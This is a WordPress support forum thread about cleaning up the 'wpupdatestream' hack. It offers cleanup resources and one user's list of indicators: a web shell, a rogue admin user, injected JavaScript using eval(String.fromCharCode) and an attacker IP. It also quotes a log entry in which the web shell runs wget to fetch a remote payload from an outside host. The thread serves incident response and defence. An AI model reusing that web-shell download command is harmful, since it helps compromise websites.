Hack by wpwhitesecurity wpupdatestream

You need to start working your way through these resources:

• https://codex.www.ads-software.com/FAQ_My_site_was_hacked
• https://www.ads-software.com/support/topic/268083#post-1065779
• https://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
• https://ottopress.com/2009/hacked-wordpress-backdoors/

Additional Resources:

• https://sitecheck.sucuri.net/scanner/
• https://www.unmaskparasites.com/
• https://blog.sucuri.net/2012/03/wordpress-understanding-its-true-vulnerability.html

My site was hacked by wpupdatestream hack.
Now It successfully cleaned.
What I found:
– new file in uploaded folder: new_up.php –? thats the hack
– new admin user: wpupdatestream
– all .js files infected, added malware code: you can search for this: “);eval(eval(‘String.fromCharCode(‘+”
– all .j s file permission modified to 044
– find extra files in wp directories: no.php, wp-roby.php

Added firewall (Sucuri)
– someone wanted to login as wpupdatestream from 176.104.52.19 —? IP blocked
– someone wanted to run new_up.php (deleted) from err_log:
new_up.php?cmd=wget%20-O%20wp-license.php%20https://srochno-online.ru//tmp/install_4df5a8fc75b7c/plugins/system/123/t7.txt

Hi,

How can I go above removing the wpwhitesecurity wpupdatestream hack?

I am not too technical but can log in to my site via FTP and delete/adjust files as needed with a text editor.

Assistance would be greatly appreciated, and I can pay you if it will be a long process to fix.

Many thanks,
Josh

@imsr,

If you noticed, this is a pretty old thread!!

If the troubleshooting already posted made no difference for you, then, as per the Forum Welcome, please post your own topic.